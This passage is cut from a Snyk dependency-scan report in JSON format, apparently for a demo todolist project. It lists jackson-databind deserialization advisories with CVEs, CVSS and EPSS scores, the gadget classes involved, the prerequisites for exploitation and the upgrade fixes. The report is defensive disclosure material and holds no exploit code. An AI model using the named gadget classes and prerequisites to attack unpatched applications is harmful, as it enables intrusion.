\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92902", - "probability": "0.05021", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11619" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-27xj-rqx5-2255" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:59:04.995807Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.585105Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "XuYuanzhen" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2704", - "title": "Github Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.439153Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", - "epssDetails": { - "percentile": "0.93100", - "probability": "0.05308", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14062" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c265-37vj-cwcc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-05-29T15:36:30.302636Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-01T15:36:06Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-05-29T15:36:05Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.587184Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Al1ex@knownsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2765", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 
8.1, - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.171514Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", - "epssDetails": { - "percentile": "0.91500", - "probability": "0.03413", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14195" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mc6h-4qgp-37qh" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-14T14:48:40.820120Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-14T14:45:09Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-14T15:32:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.570033Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Topsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2688", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - 
"modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.405517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.94931", - "probability": "0.10105", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14060" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-j823-4qch-3rgm" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T10:29:46.691157Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:23:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - 
"groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:46:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.574354Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2698", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - 
"assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.989304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.91508", - "probability": "0.03404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14061" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c2q3-4qrh-fm48" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T11:03:46.232208Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:59:39Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
